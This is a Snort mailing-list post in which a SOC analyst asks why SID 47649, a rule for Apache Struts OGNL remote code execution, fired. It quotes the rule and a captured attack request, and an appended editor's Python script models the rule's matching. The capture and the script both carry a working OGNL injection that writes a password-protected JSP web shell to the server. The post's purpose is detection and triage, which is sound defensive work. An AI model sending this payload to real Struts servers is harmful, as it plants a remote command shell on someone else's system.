Snort mailing list archives
Understanding SNORT ID 47649
From: Migell Roberts <migell.roberts () gdt com>
Date: Mon, 1 Apr 2019 17:52:19 +0000
I've been looking in the snort manual for an explanation on SID 47649 below and unfortunately, I can't find what I need:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Apache Struts remote code execution attempt"; flow:to_server; content:"|23|_memberAccess"; fast_pattern:only; http_uri:; content:"ognl."; http_uri:; pcre:"/ognl\x2e(OgnlContext|ClassResolver|TypeConverter|MemberAccess)/Ui"; metadata:policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service http; reference:cve,2018-11776; reference:url,cwiki.apache.org/confluence/display/WW/S2-057; classtype:attempted-user; sid:47649; rev:1; gid:1; )

We have Cisco Firepower and the above SID triggered. I'd like to know how the above SID triggered (I have some assumptions, but didn't want to assume).

To paint more of a picture, below is the text captured from packet captures related to the event I found:

[non-printable TCP/IP header bytes]
ut.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://www.pba.com/
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html）
Client-IP: 10.10.10.1
Cookie: akaas_PBAdotComAudienceSegmentation=2147483647~rv=26~id=396fe2c7446d729001164ba005e14de4~rn=
True-Client-IP: 120.7.79.15
X-Akamai-CONFIG-LOG-DETAIL: true
TE: chunked;q=1.0
Connection: TE
Accept-Encoding: gzip
Akamai-Origin-Hop: 2
Via: 1.1 v1-akamaitech.net(ghost) (AkamaiGHost), 1.1 akamai.net(ghost) (AkamaiGHost)
X-Forwarded-For: 10.10.10.1, 120.7.79.15, 150.142.22.3
Host: www.pba.com
Cache-Control: max-age=86400
Connection: keep-alive

AND

[non-printable TCP/IP header bytes]
GET /struts2-showcase/filedownload/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20o

Regards,

Migell E. Roberts | SOC Analyst
214.873.9250 office
migell.roberts () gdt com
gdt.com (https://www.gdt.com/) | 999 Metromedia Place, Dallas, TX 75247
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists snort org
https://lists.snort.org/mailman/listinfo/snort-sigs
Please visit http://blog.snort.org for the latest news about Snort!
Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette
Visit Snort.org to subscribe to the official Snort ruleset, and make sure to stay up to date to catch the most emerging threats: https://snort.org/downloads/#rule-downloads
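Added example (editor's code, not part of the post above and not Snort's own matcher): a small Python model of the three payload checks in SID 47649, run over the request line quoted in the post, to show why the rule fired. The point the rule syntax hides is that `http_uri` and the pcre `U` flag match against the HTTP inspector's normalized URI buffer, in which `%23` has already been decoded to `#`, so the on-the-wire string `%23_memberAccess` satisfies `content:"|23|_memberAccess"` even though the raw bytes never contain `#`. The model reduces normalization to percent-decoding, which is all this capture needs; flow direction, port variables and the inspector's other normalizations are not modelled. The second function decodes the query parameters that the OGNL expression reads, so an analyst can see what the request attempted: the expression in the `method:` prefix sets `#_memberAccess` to `DEFAULT_MEMBER_ACCESS` (the usual OGNL sandbox bypass), resolves the servlet request from `reqobj[0]`, builds a path from `getRealPath(reqobj[1]) + reqobj[2]`, and writes `content[0]` (JSP source behind a `gif89a` prefix) to it. The sample request line is copied from the post and trimmed; the benign request line is constructed. One caveat for triage: the contents and pcre match the generic `#_memberAccess` / `ognl.OgnlContext` fragment, so the rule will also fire on Struts OGNL injection attempts that have nothing to do with the S2-057 advisory it references.

```python
import re
from urllib.parse import parse_qs, unquote

# Sample taken from the packet capture quoted in the post, with the query string trimmed
# to the parts needed here (the original is longer and is cut off in the post itself).
CAPTURED_REQUEST_LINE = (
    "GET /struts2-showcase/filedownload/index.action?"
    "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,"
    "%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],"
    "%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],"
    "%23fos%3dnew%20java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes())"
    "&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest"
    "&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
    "&reqobj=%2f&reqobj=test.jsp"
    "&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B"
    " HTTP/1.1"
)
# Constructed benign request to the same action, for contrast.
BENIGN_REQUEST_LINE = "GET /struts2-showcase/filedownload/index.action?method=download&id=42 HTTP/1.1"

# The rule's payload checks, in the order Snort evaluates them.
FAST_PATTERN = "#_memberAccess"   # content:"|23|_memberAccess"; fast_pattern:only; http_uri  (0x23 is '#')
SECOND_CONTENT = "ognl."          # content:"ognl."; http_uri   (no nocase, so case-sensitive)
PCRE = re.compile(r"ognl\x2e(OgnlContext|ClassResolver|TypeConverter|MemberAccess)", re.I)  # /.../Ui


def uri_from_request_line(line):
    """Return the request-target from 'METHOD SP request-target SP HTTP-version'."""
    _method, uri, _version = line.split(" ", 2)
    return uri


def normalize_uri(raw_uri):
    """Approximation of the HTTP inspector's normalized URI buffer: percent-decoding only.
    http_uri contents and the pcre 'U' flag are matched against this buffer, not raw bytes."""
    return unquote(raw_uri)


def evaluate_sid_47649(request_line):
    """Walk the rule's checks the way Snort would and report which ones matched."""
    raw_uri = uri_from_request_line(request_line)
    uri = normalize_uri(raw_uri)
    result = {
        "raw_uri_has_fast_pattern": FAST_PATTERN in raw_uri,  # what a raw-byte match would see
        "fast_pattern": FAST_PATTERN in uri,
        "second_content": False,
        "pcre_match": None,
        "alert": False,
    }
    if not result["fast_pattern"]:
        return result  # fast-pattern miss: the rest of the rule is never evaluated
    result["second_content"] = SECOND_CONTENT in uri
    if not result["second_content"]:
        return result
    m = PCRE.search(uri)
    result["pcre_match"] = m.group(0) if m else None
    result["alert"] = m is not None
    return result


def summarize_payload(request_line):
    """Decode the parameters the OGNL expression reads: the file written is
    getRealPath(reqobj[1]) + reqobj[2], and its body is content[0]."""
    raw_uri = uri_from_request_line(request_line)
    query = raw_uri.split("?", 1)[1] if "?" in raw_uri else ""
    params = parse_qs(query)  # the 'method:' chunk has no '=' and is skipped, as intended
    reqobj = params.get("reqobj", [])
    content = params.get("content", [""])[0]
    return {
        "ognl_in_method_prefix": query.startswith("method:"),
        "target_file_relative": (reqobj[1] + reqobj[2]) if len(reqobj) >= 3 else None,
        "content_prefix": content[:6],          # 'gif89a' in the capture
        "content_is_jsp": "<%" in content,      # JSP source follows the GIF prefix
    }


if __name__ == "__main__":
    print(evaluate_sid_47649(CAPTURED_REQUEST_LINE))
    print(evaluate_sid_47649(BENIGN_REQUEST_LINE))
    print(summarize_payload(CAPTURED_REQUEST_LINE))
```

Running it shows `raw_uri_has_fast_pattern` false but `fast_pattern` true for the captured request, which is the whole answer to "how did it trigger": the match happened on the decoded URI. The benign request fails at the fast-pattern stage and the rule is never fully evaluated.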
Current thread:
- Understanding SNORT ID 47649 Migell Roberts (Apr 03)
- Re: Understanding SNORT ID 47649 wkitty42--- via Snort-sigs (Apr 03)
- Re: Understanding SNORT ID 47649 Alex McDonnell (Apr 03)
- Re: Understanding SNORT ID 47649 wkitty42--- via Snort-sigs (Apr 03)